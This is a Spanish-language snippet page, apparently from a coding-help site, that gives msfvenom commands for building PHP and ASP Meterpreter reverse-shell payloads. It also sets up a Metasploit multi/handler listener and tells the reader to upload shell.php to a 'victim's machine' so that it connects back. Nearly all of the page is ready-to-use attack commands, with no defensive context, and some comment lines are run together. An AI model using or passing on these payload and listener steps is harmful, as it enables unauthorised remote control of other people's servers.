Saltar al contenido

msfvenom php shell inverso meterpreter ejemplo de código

Luego de observar en varios repositorios y páginas al concluir hemos dado con la resolución que te mostraremos pronto.

Ejemplo 1: shell inverso msfvenom php

##This will create the payload file "shell.php" with your ip and port.
msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP>LPORT=<$LOCAL_PORT>-f raw -o shell.php
##You can always "nano" the file to change your ipaddr and port incase you messed up the first step.#Run 'msfconsole' to start the listener then run the following command.useexploit/multi/handler 
set PAYLOAD php/meterpreter/reverse_tcp
#set your ipaddr
set LHOST<$LOCAL_IP>#set your listening port
set LPORT<$LOCAL_PORT>#"show options" to check ur steps then run the command "exploit"
exploit #this will start the listener#Upload "shell.php" to your victim's machine.#The victim's machine will need to run the file to connect back to your machine.

Ejemplo 2: hoja de trucos de msfvenom aspx

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On>-f asp > shell.asp

Aquí tienes las reseñas y valoraciones

Si piensas que te ha resultado útil este artículo, nos gustaría que lo compartas con otros juniors y nos ayudes a difundir nuestro contenido.

¡Haz clic para puntuar esta entrada!
(Votos: 0 Promedio: 0)



Utiliza Nuestro Buscador

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *